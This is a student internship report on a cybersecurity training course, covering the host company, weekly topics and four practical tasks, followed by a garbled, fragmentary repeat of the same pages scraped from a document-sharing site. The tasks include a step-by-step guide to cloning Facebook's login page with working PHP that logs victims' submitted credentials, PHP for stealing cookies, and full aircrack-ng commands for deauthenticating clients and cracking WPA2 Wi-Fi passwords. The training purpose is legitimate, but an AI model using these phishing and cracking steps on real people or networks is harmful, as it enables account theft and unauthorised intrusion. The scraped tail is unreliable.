Visvesvaraya Technological University

Internship Report 2019-20
VISVESVARAYA TECHNOLOGICAL UNIVERSITY

BELAGAVI, KARNATAKA, INDIA
INTERNSHIP REPORT
Submitted for the award of the degree of
BACHELOR OF ENGINEERING
IN
ELECTRONICS AND COMMUNICATION ENGINEERING

By
Ms. Jenita Diana Dsouza (USN: 4CB16EC034)
Department of Electronics and Communication Engineering

Canara Engineering College
Bantwal – 574219, Karnataka, India.
Department of Electronics and Communication Engineering, CEC, Bantwal. Page 1

2019-2020
Department of ELECTRONICS AND COMMUNICATION
ENGINEERING
Canara Engineering College
Bantwal – 574219.
Certificate
This is to certify that Ms. JENITA DIANA DSOUZA Bearing USN: 4CB16EC034, a
bonafide student of Canara Engineering College has undergone 4 weeks of
INTERNSHIP at SLEKINS Technical Solutions, Mangalore. This internship report is
submitted in partial fulfillment for the award of BACHELOR OF ENGINEERING in
Electronics and Communication Engineering of the Visvesvaraya Technological
University, Belagavi during the year 2019-2020.
Prof. Rajitha Prof. Sujith Sathish Pai

Internal Guide Internship Coordinator
Assistant Professor Assistant Professor
Department of Electronics and Department of Electronics and
Communication Engineering Communication Engineering
Dr. Rajalakshmi Samaga B L

Professor and Head
Department of Electronics and Communication Engineering
Name and signature of Examiners
1. _______________________ ______________
2._______________________ ________
COMPANY CERTIFICATE

ACKNOWLEDGEMENTS
I am indebted to my Principal, Dr. Ganesh V. Bhat and management of Canara

Engineering College for providing an environment with all facilities that helped us in
completing the Internship.
I am extremely grateful to Dr. Rajalakshmi Samaga B. L, Head of Electronics and

Communication Engineering Department for her moral support and encouragement.
I wish to express our sincere gratitude to our internship Coordinator Prof. Sujith Sathish
Pai and internal guide Prof. Rajitha from Electronics and Communication Engineering
Department, for their guidance and suggestions.
I thank SLEKIN Technical Solutions for providing a good and practically absorbable
internship in the given period, for making the internship program a great experience and the
learning – very comprehensible and relevant to carry in the future.
I thank the all the teaching and non-teaching staff of Electronics and Communication
Engineering for the kind cooperation during the practical sessions.
JENITA DIANA DSOUZA
4CB16EC034

TABLE OF CONTENTS
CHAPTER 1.......................................................................................................................................7
COMPANY PROFILE.................................................................................................................. 7
Company logo ..................................................................................................................................7
CHAPTER 2.......................................................................................................................................8
ABOUT THE COMPANY.............................................................................................................8
CHAPTER 3.......................................................................................................................................9
ABOUT THE INTERNSHIP..........................................................................................................9
3.1 WEEK WISE SUMMARY OF INTERNSHIP:...................................................................9
CHAPTER 4.....................................................................................................................................12
TASK PERFORMED...................................................................................................................12
4.1 TASK 1…………………………………………………………………………… 12
4.2 TASK 2……………………………………………………………………………..13
4.3 TASK 3……………………………………………………………………………..14
4.4 TASK 4……………………………………………………………………………..16
CHAPTER 5…………………………………………………………………...19
REFLECTIONS…………………………………………………………………………19
CHAPTER 6………………………………………………………………… ..20
CONCLUSION……………………………………………………………………………………….20
APPENDIX A.............................................................................................................................21-24
CODES....................................................................................................................................21-24
APPENDIX B.............................................................................................................................25-28
WEEKWISE LEARNING......................................................................................................25-28
APPENDIX C.............................................................................................................................29-31
FEEDBACK ABOUT THE INTERNSHIP EXPERIENCE...................................................29-31

LIST OF FIGURES
FIGURE 4.1 TERMINAL OUTPUT………………………………………………………14


CHAPTER 1
COMPANY PROFILE
Slekin Technical Solutions is one of the leading companies in embedded system, industrial
automation and software technology from mangalore. Their goal is to provide best products
to the customers. They also provide technical training for young engineers looking to have
successful careers in Industrial Automation, Embedded systems, Web design and
development, Android Applications and Computer software. They also render best technical
solutions and services in industrial automation, embedded systems and software technologies
to leading industries and entrepreneurs in mangalore and around Karnataka.
They aim to provide sound technical competence combined with a complete confidence in
our ability to deliver your project. Slekin has strong commitment and prompt sense of duty to
provide quality training for graduates, innovative solutions and services at all times. They
thrive hard to operate in more sustainable manner and provide with most advanced quality
services and solutions to clients, and deliver highest level of professionalism.
Vision: ❝To be recognized as one of the globally leading organization in Technical training,
services and solutions ❞
Mission:❝To provide ample of opportunities for creative ideas of new generation❞
Core Values: They maintain total transparency in our approach for achieving goals and
fulfilling our commitments. They strive for excellence in all our endeavours.

CHAPTER 2
ABOUT THE COMPANY

History: Slekin Technical Solution is one of leading companies in EMBEDDED SYSTEM,
INDUSTRIAL AUTOMATION and SOFTWARE TECHNOLOGY.
It was founded in the year 2017.
Industry: Information Technology and Services.
Headquarters: Mangalore, Karnataka
Specialties: Embedded System, Industrial Automation, Information and Technology,
Industrial Projects and Services, Website Design and Development, Research and
Development, Academic projects and training.
Services: Slekin Technical Solutions in Mangalore is the only firm to impart training in
artificial intelligence and optical fibre cable. The company also trains students studying in
primary and high schools in robotics, hoping to create a strong foundation and hence help
students opt different branches of engineering in future.
The company provides an opportunity for students to get trained in various sections of
engineering departments. Since its inception, over 1000 students have been trained in the
company.
Contact Information:
Email: contact@slekin.com
Office: 0824-2986421
Website: http://www.slekin.com

CHAPTER 3
ABOUT THE INTERNSHIP

The internship was focused on making the students aware of the current trends in the field of
Cybersecurity and provide practical experience on basic security features and attacks.
Different aspects of Cybersecurity was analysed over 4 weeks and tasks were allotted to be
worked out:
In general the following aspects were dealt with in detail:

Introduction to Cyber security
Types of Attackers
Types of Attacks
Types of Web
Tor Network
Ethical an Non-Ethical Uses of Web
Safe usage practices when browsing Web
Encryption Techniques
Key exchange and authentication algorithms
Risks involved in different sectors of internet like
E-commerce and Social Media
Types of Honey tokens
Usage of Canary Tokens in Honey pot attacks
A Practical approach to understanding different Attacks
Introduction to Kali Linux
Introduction to different tools in Kali Linux
Introduction to packet based attacks

3.1 WEEK WISE SUMMARY OF INTERNSHIP:

WEEK 1:
This week started by having the author given an information about the Internship, the content
that would be covered and what would be expected.
It was proposed to cover the introduction to cyber Security, Goals of Cyber Security, Types
of Attacks, Introduction to XAMPP, Malwares, Types of Attackers, Introduction to Sublime
text, Introduction to php, Encryption crash course, Types of web, Tor Browser, Installation of
Tor Browser in windows etc.
Practical like Hosting a basic HTML webpage on local server, Practical on phishing, Hack
Facebook using Phishing site, Hosting a webpage and creating form and Hosting an onion
webpage are done.
WEEK 2:
In the second week the program was more intensive with the intensive learning of Honey
Trap, Different types of Honey Trap, Canary Token, Google search Tricks, Introduction to
linux system, shell commands in linux system, Introduction to kali linux etc.
The Author was made aware of the practical such as Hosting local server using apache 2
server, Practical on canary tokens, Hosting a webpage, creating form, Installing Kali linux,
Cracking password of form through brute force attack, Cracking password using SQL
Injection etc.
WEEK 3:
In the third week of the internship program, the Author was taught about the Introduction to
my SQL, Introduction to Security Technologies, Packet filtering, Session hijacking,
Introduction to Diffie Hellman key exchange Algorithm, End to End encryption, SSL
Cryptography, RSA Algorithm, Electronic Payment System, Threat to E-commerce and Risk
Evaluation of Electronic payment system were taught.
Practical on Creating database using php my admin interface, Session hijacking by stealing
cookie from targets browser, Buffer overflow attack, DigiCert are done.

WEEK 4:
In the last week of Internship the author explained Introduction to E-cash, Types of Attacks
Associated with Secure Electronic Transaction Protocol, Dual Signature and it’s operational
Model, Blockchain, Types or layers in Blockchain, Cryptocurrency and SHA algorithm.
Practical on RSA algorithm encryption & decryption, perform MITM attack using Ettercap
tool on KALI Linux, Cracking WIFI password using Brute force attack and airmon-
ng[Aircrack-ng]tool on KALI Linux.

CHAPTER 4
TASK PERFORMED
Though the internship involved many problems that were solved the author has chosen a
selected list of problem statements that were from an industry requirement perspective and
has chalked out schemes to implement it. The detailed concepts are appended in section
Appendix A of the report.
4.1 TASK 1:
Host a basic HTML webpage with login form created using XAMPP on a
Apache HTTP server.
Step1:
Go to "Start" on the Windows taskbar and type "XAMPP" into the search box. Select
"XAMPP Control Panel" and press the "Enter" key. Start Apache from the XAMPP Control
Panel. Apache is ready for use once the word "Running" highlighted in green.
Step2:
Go to "Start" and open "Computer." Navigate to XAMPP folder, normally found as a top
level folder under computer's main hard drive. Open the htdocs folder.
Step3:
Open "Computer" again and navigate to the folder where HTML files are stored. If no file
has been created before, create an HTML file and save it to the htdocs folder under the
XAMPP folder.
Step4:

Start the Web browser and type "localhost/filename.html" into the address bar. Press "Enter"
and watch the HTML file load as a Web page. Now the Apache server that came with
XAMPP is serving your Webpages.

4.2 Task 2:
Hack Facebook using Phishing attack:
Step1: Download the HTML Index of the Target Webpage.
To start off, we need to obtain the HTML index of the page. There are various methods of
doing this, there are even templates online for popular sites. To accomplish this:
i. Navigate to the target webpage.
ii. View Source of the webpage.
iii. Download and save the source code with encoding Unicode and file extension.htm or.html
Step2: Creating a PHP File for Password Harvesting.
The PHP file is basically the tool that harvests the users password in this scenario. Save the
PHP file with encoding Unicode and fileextension.php
Step3: Modify the Page HTML File to Incorporate the PHP File created.
We need to incorporate the PHP file, to receive passwords that the users send. To accomplish
this we have to find the Password-Sending Method in the webpage saved.
i. First, understand how the web site deals with the scenario where the user submits a
username/password.
ii. For Facebook, press Ctrl+F and type "=action" in the field. Replace the URL in action
field with “filename.php“.
Step4:
Now copy the HTML file and PHP file to htdocs folder in XAMPP directory. Type the URL
"localhost/filename.html". Type user credentials and login. In htdocs folder a new file is
generated called log.txt with the entered credentials and the user is redirected to official
Facebook homepage. We can also host the HTML page using a web hosting service and
using an FTP server to store PHP file and the generated log.txt file.

4.3 Task 3:
Session Hijacking by stealing cookies from target’s browser.

Step1: Create a HTML webpage that sets cookie and a PHP file that steals cookies.
Step2 : Follow the steps in Task 1 to host the webpage. Also copy the PHP file to htdocs
folder in XAMPP directory.
Step 3 : Start the Web browser and type "localhost/filename.html" into the address bar. Press
"Enter" and watch the HTML file load as a Web page. When the HTML file loads , the
cookie described in the code will be set.
Step 4 : Now run the PHP file. A file cookiefile.txt will be generated in the htdocs folder with
the cookie set in the webpage.
4.4 Task4
Hacking WIFI WPA2-PSK passwords using ai rmon-ng [Aircrack-ng] tool on KALI
Linux.
Step1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Open Terminal and type the command: airmon-ng start wlan0
Fig 4.1:TERMINAL OUTPUT

Note: that airmon-ng has renamed your wlan0 adapter to mon0.

Step2: Capture Traffic with Airodump-Ng
Now that the wireless adapter is in monitor mode, it has the capability to see all the wireless
traffic that passes by in the air. Hence, we can grab that traffic by simply using the airodump-
ng command. This command grabs all the traffic that your wireless adapter can see and
displays critical information about it, including the BSSID, power, number of beacon frames,
number of data frames, channel, speed and the ESSID. This is done by using the command:
airodump-ngmon0.
Fig 4.2:Terminal output

Step3: Focus Airodump-Ng on One AP on One Channel
Next step is to focus all efforts on one AP, on one channel, and capture critical data from it.
We need the BSSID and channel to do this. Open another terminal and type: airodump-ng
--bssid08:86:30:74:22:76-c6 —write WPAcrack mon0

08:86:30:74:22:76 is the BSSID of the AP

-c6 is the channel the AP is operating on
WPAcrack is the file you want to write to
mon0 is the monitoring wireless adapter*
Step4: Aireplay-Ng Deauth

In order to capture the encrypted password, client must be authenticated against the AP. If
they're already authenticated, DE-authenticate them and their system will automatically
reauthenticate, whereby any encrypted password can be grabbed in the process. Open
terminal and type command: aireplay-ng –deauth 100- a 08:86:30:74:22:76 mon0
100 is the number of DE-authenticate frames you want to send

08:86:30:74:22:76 is the BSSID of the AP
mon0 is the monitoring wireless adapter

Step5: Capture the Handshake

In the previous step, the user was bounced off their own AP, and now when they
reauthenticate, airodump-ng will attempt to grab their password in the new 4-way handshake.
Go back to our airodump-ng terminal and check to see whether or not the task is successful.
Notice in the top line to the far right, airodump-ng says "WPA handshake." This tells us that
we were successful in grabbing the encrypted password.
Step6: Use Aircrack-Ng to crack the password
Now that the encrypted password is stored in the file WPAcrack, the file can be run against
aircrack-ng using a password file of choice. This type of attack is only as good as the
password file. Here, the default password list included with aircrack-ng on Back Track
named darkcOde is used. Open another terminal and type the command:
aircrack-ng WPAcrack-01.cap -w/pentest/passwords/wordlists/darkc0de

 WPAcrack-01.cap is the name of the file written using the airodump-ng

command
 /pentest/passwords/wordlist/darkc0de is the absolute path to the password file
This process can be relatively slow and tedious. Depending upon the length of the password
list, it will take a few minutes to a few days. Once the password is found, it will appear on the
screen.

CHAPTER 5
REFLECTIONS
The idea of internship programmes sees merit in attempting to shorten the period on training
that is often significant duration to orient the trainee or newly inducted person onto the
project.
The insight and knowledge acquired during the internship program as foundation course is
often deemed to be very fundamental laying an edifice for one to easily learn and absorb
upcoming technologies and update oneself. The internship programs has helped the author to
improve the basic understanding in the field of Cyber Security and the concepts necessary to
pursue a future in the field of Cyber Security.
Today’s interconnected world makes everyone more susceptible to cyber-attacks,

Cybersecurity in addition to being in a lot of demand as a necessary skill set in one’s resume
for a job aspirant in the Network security sector. The concepts were taught in a very clear
precise and lucid manner having the doubts cleared and enthused the participants to readily
take up the opportunity to write effective code for the problem statements given within the
allocated time and cherish the opportunity. The training helped the author build a strong
foundation in the field and has also given the confidence needed to pursue a career in the
field.
The training session has been a great learning journey helping the participants in the
internship programme and the author, in particular, understand the different aspects of the
field in greater detail.
The conclusive remarks about the whole program which was taken up as a part of the
mandatory course is discussed in detail in the f

CHAPTER 6
CONCLUSION
This section usually gives the reader a brief of how well the study or a thesis was executed.
The author in this instance wishes to place on record that there have been many instances
where learning on one’s own as in the case of a building project or drafting a seminar thesis,
however these help one to be more independent. The need for internship is more emergent as
one needs to be oriented with self learning capacities required at a very short notice in
industry.
In this regard the way of teaching the methodology in one session and implementing in the
next was well appreciated in understanding most concepts exceptionally well. In addition the
increasing levels of difficulty of concept’s and practical conducted kept the participants
engaged with a better fervor.
The real takeaway from the program however has been the various instances where a norm
was carefully inculcated as best browsing practices, methods to keep oneself safe in an
increasingly dangerous virtual world.
Additionally the industry expectation in greeting and interaction with colleagues and co
workers, be it peers or superiors was discussed. The insight regarding professional behavior,
conformation to deadlines and institute mandates and compliance to standards and standard
practices are not appreciated by reading literature regarding it but by practicing. The four
week program was a learning experience in more aspects than one. The author gained new
insights about the aforementioned aspects in a truly professional manner.

APPENDIX A
CODES
1.Host a basic webpage with login form created using XAMPP on a Apache
HTTP Server.
The following code creates an HTML page with a simple login form.
HTML CODE:
<!DOCTYPEhtml>
<html>
<head>
<title>Form in HTML</title>
</head>
<body>
<form>
<label for="username">Username:</label>
<input type="text" name="username"><br/>
<label for="password">Password:</label>
<input type="password" id="password" name="password"/> <br/>
<input type="submit" value="submit">
</form>
</body>
</html>
OUTPUT:

2.Phishing Attack using facebook homepage source code.

PHP CODE:
<?php
header('Location:facebook.com');
$handle=fopen("log.txt", "a");
foreach($_POST as $variable=>$value){
fwrite($handle, $variable);
fwrite($handle,"=");
fwrite($handle, $value);
fwrite($handle,"\r\n");
}
fwrite($handle,"\r\n\n\n\n");
fclose($handle); exit; ?>
OUTPUT:

3.Session Hijacking by stealing cookies from target’s browser.

The following example creates a cookie named "user" with the value "John Doe". The cookie
will expire after 30 days (86400*30).The"/" means that the cookie is available in entire
website.
HTML CODE with PHP CODE setting cookie:
<!DOCTYPE html>
<?php
$cookie_name="user";
$cookie_value="John Doe"; setcookie($cookie_name,$cookie_value,time()
+(86400*30),"/");//86400=1
day ?>
<html>
<body>
<h1>COOKIESTEALINGDEMO</h1>
</body>
</html>
PHP CODE for stealing cookie:
<?php
header('Location : localhost/filename.html');
$cookie =$HTTP_GET_VARS[“cookie”];
$steal=fopen(“cookiefile.txt”,
“a”);
fwrite($steal,$cookie
.”\n”); fclose($steal);
?>

OUTPUT:

APPENDIX B
WEEKWISE LEARNING
Week Number Learning Summary
WEEK 1 Day-1 07/07/19
Introduction to Cybersecurity. Goals of
Cybersecurity.
Types of Attacks.
Day-2 18/07/19
Introduction to XAMPP.
Practical-Hosting a basic HTML webpage on a
local sever.
Day-3 19/07/19
Malwares.
Types of Attackers.
Practical on Phishing.
Day-4 20/07/19
Introduction to Sublime Text.
Introduction to PHP.
Practical-Creating a HTML webpage with a form
using PHP.
Day-5 21/07/19
Crash course on different Encryption
Techniques.
Day-6 22/07/19
Types of Web. Introduction to TOR network and
Browser.
Practical-Hosting an onion Webpage.
Day-7 23/07/19
Introduction to Honey Trap.
attacks and Honey tokens. Types of Honey
Tokens.

Introduction to Canary Token.
WEEK 2 Day-8 24/07/19

Practical – Usage of canary Token.
Google search tricks.
Day-9 25/07/19
Introduction to Linux System.
Shell commands and programming on Linux.
Day-10 26/07/19
Introduction to Kali Linux.
Practical-Hosting a local server on Linux using
apache 2 server.
Day-11 27/07/19
Practical-Hosting a Webpage on Linux.
Practical-Creating a Login form using PHP and
hosting the HTML webpage on server.
Day-12 29/07/19
Practical-Cracking password entered in login
form using Brute Force Attack. Practical-
Cracking password entered in login form using
SQL Injection Attack.
Day-13 20/01/2020
Introduction to MySQL.
Introduction to php My Admin.
Day-14 21/01/2020
Practical-Create database using php My Admin
Interface.
Practical-Create Login Form which stores data in
MySQL database.

WEEK 3 Day-15 22/01/2020

Introduction to Security Technologies.
Introduction to Packet Filtering.
Day-16 23/01/2020
Introduction to Session Hijacking.
Practical-Session Hijacking by stealing cookie
from target’s browser.
Day-17 24/01/2020
Practical- Usage of Buffer Overflow Attack.
Introduction to Diffie-Hellman Key Exchange
Algorithm.
Day-18 25/01/2020
Introduction to Concept-Primitive root of a prime
number.
Introduction to Concept-End to End Encryption.
Day-19 26/01/2020
Introduction to SSL Cryptography.
Practical- How SSL certificates are generated and
assigned to Webpage. (DigiCert)
Day-20 27/01/2020
Introduction to RSA Algorithm.
Practical-Encryption and Decryption of a
message using RSA algorithm.
Day-21 28/01/2020
Introduction to E-commerce Security Model.
Threats to E -commerce. Risk evaluation of
Electronic Payment System

WEEK 4 Day-22 29/01/2020

E-cash and types of attacks associated with it.
Introduction to Secure Electronic Transaction
Protocol.
Day-23 30/01/2020
Introduction to Dual Signature Scheme.
Day-24 31/01/2020
Working of Dual Signature Model.
Real World Examples, where Dual Signature is
used.
Day-25 01/02/2020
Introduction to Blockchain.
Day-26 03/02/2020
Introduction to Cryptocurrencies.
Day-27 04/02/2020
Introduction to SHA Algorithm.
Day-28 05/02/2020
Practical-Using Ettercap tool on KALI Linux,
execute MITM attack on target and sniff packets.
Practical-Using airmon-ng[Aircrack-ng]tool on
KALI Linux, execute a brute force attack to crack
WIFIWPA2-PSK password

APPENDIX C
FEEDBACK ON THE INTERNSHIP EXPERIENCE
Parameters Strongly Agre Can’t Disagree Strongly
Agree e say Disagree
Helped me to understand the YES
subjects Studied in classroom
in a proper way
Made me aware of the work YES
culture and Importance of
ethics in the industry
Provided clarity about the YES
existing Career opportunities.
Provided a stage for exhibiting YES
my Skills and knowledge
Helped me improve my self- YES
discipline
Helped me to gain confidence YES
to make a good career
decision after graduation in
core field.
Provided an opportunity to YES
improve my interpersonal
skills
Made me aware of the need YES
for life long learning
Helped me to develop new YES
contacts which may help my
future employment

Will be able to implement the YES

skills in My institution

Visvesvaraya Technological University

Загружено:

Сведения о документе

Исходное описание:

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Visvesvaraya Technological University

Загружено:

Авторское право:

Доступные форматы

Internship Report 2019-20

VISVESVARAYA TECHNOLOGICAL UNIVERSITY

ELECTRONICS AND COMMUNICATION ENGINEERING

Ms. Jenita Diana Dsouza (USN: 4CB16EC034)

Department of Electronics and Communication Engineering

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 1

Prof. Rajitha Prof. Sujith Sathish Pai

Dr. Rajalakshmi Samaga B L

Name and signature of Examiners

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 3

I am indebted to my Principal, Dr. Ganesh V. Bhat and management of Canara

I am extremely grateful to Dr. Rajalakshmi Samaga B. L, Head of Electronics and

JENITA DIANA DSOUZA

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 4

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 5

FIGURE 4.1 TERMINAL OUTPUT………………………………………………………14

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 6

Mission:❝To provide ample of opportunities for creative ideas of new generation❞

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 7

ABOUT THE COMPANY

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 8

ABOUT THE INTERNSHIP

In general the following aspects were dealt with in detail:

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 9

3.1 WEEK WISE SUMMARY OF INTERNSHIP:

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 10

Model, Blockchain, Types or layers in Blockchain, Cryptocurrency and SHA algorithm.

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 11

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 12

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 13

Hack Facebook using Phishing attack:

Step1: Download the HTML Index of the Target Webpage.

i. Navigate to the target webpage.

ii. View Source of the webpage.

Step2: Creating a PHP File for Password Harvesting.

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 14

Session Hijacking by stealing cookies from target’s browser.

Step1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 15

Open Terminal and type the command: airmon-ng start wlan0

Fig 4.1:TERMINAL OUTPUT

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 16

Note: that airmon-ng has renamed your wlan0 adapter to mon0.

Fig 4.2:Terminal output

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 17

08:86:30:74:22:76 is the BSSID of the AP

Step4: Aireplay-Ng Deauth

100 is the number of DE-authenticate frames you want to send

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 18

Step5: Capture the Handshake

Step6: Use Aircrack-Ng to crack the password

aircrack-ng WPAcrack-01.cap -w/pentest/passwords/wordlists/darkc0de

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 19

 WPAcrack-01.cap is the name of the file written using the airodump-ng

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 20

Today’s interconnected world makes everyone more susceptible to cyber-attacks,

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 21

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 22

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 23

2.Phishing Attack using facebook homepage source code.

Department of Electronics and Communication Engineering, CEC, Bantwal. Page 24

3.Session Hijacking by stealing cookies from target’s browser.